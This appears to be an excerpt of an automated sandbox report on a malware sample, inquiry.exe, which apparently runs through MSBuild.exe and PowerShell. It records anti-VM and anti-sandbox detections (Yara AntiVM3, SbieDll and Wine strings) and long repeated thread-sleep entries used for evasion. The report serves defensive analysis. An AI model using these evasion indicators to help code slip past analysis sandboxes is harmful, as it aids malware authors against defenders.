Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\inquiry.exe	Memory allocated: 1F869C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\inquiry.exe	Memory allocated: 1F86B5D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: F90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599043	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598934	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598823	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596996	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596862	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596681	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595919	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595810	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594620	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594293	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593373	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592806	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592156	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5783	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 3558	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 6256	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5140	Thread sleep count: 3558 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -599043s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598934s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5140	Thread sleep count: 6256 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598823s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598233s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -597778s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -597327s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -597108s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -596996s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -596862s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -596681s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -595919s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -595810s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -595327s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594620s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594515s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594293s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -594078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -593969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -593844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -593734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -593373s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -593202s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -593079s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -592953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -592806s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -592703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -592593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -592484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -592375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -592266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452	Thread sleep time: -592156s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599043	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598934	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598823	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596996	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596862	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596681	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595919	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595810	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594620	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594293	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593373	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592806	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 592593	Jump to behavior
